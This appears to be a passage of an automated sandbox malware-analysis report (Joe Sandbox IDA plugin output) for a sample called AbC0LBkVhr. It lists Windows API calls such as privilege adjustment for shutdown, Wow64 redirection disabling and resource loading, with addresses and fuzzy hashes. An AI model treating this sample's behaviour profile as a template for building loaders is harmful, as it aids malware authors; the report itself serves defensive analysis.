                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage
                                                          • String ID:
                                                          • API String ID: 1306739567-0
                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                          APIs
                                                          • SetEndOfFile.KERNEL32(?,02117FF4,0040A08C,00000000), ref: 004076B3
                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 734332943-0
                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                          APIs
                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                          APIs
                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                          APIs
                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 107509674-3733053543
                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                          APIs
                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID:
                                                          • API String ID: 3473537107-0
                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                          APIs
                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: SystemTime
                                                          • String ID:
                                                          • API String ID: 2656138-0
                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Version
                                                          • String ID:
                                                          • API String ID: 1889659487-0
                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseHandleModuleProc
                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                          • API String ID: 4190037839-2401316094
                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                          • String ID:
                                                          • API String ID: 1694776339-0
                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale$DefaultSystem
                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                          • API String ID: 1044490935-665933166
                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                          • LocalFree.KERNEL32(00680C50,00000000,00401AB4), ref: 00401A1B
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00680C50,00000000,00401AB4), ref: 00401A3A
                                                          • LocalFree.KERNEL32(0067F290,?,00000000,00008000,00680C50,00000000,00401AB4), ref: 00401A79
                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                          • String ID:
                                                          • API String ID: 3782394904-0
                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExitMessageProcess
                                                          • String ID: Error$Runtime error at 00000000$9@
                                                          • API String ID: 1220098344-1503883590
                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
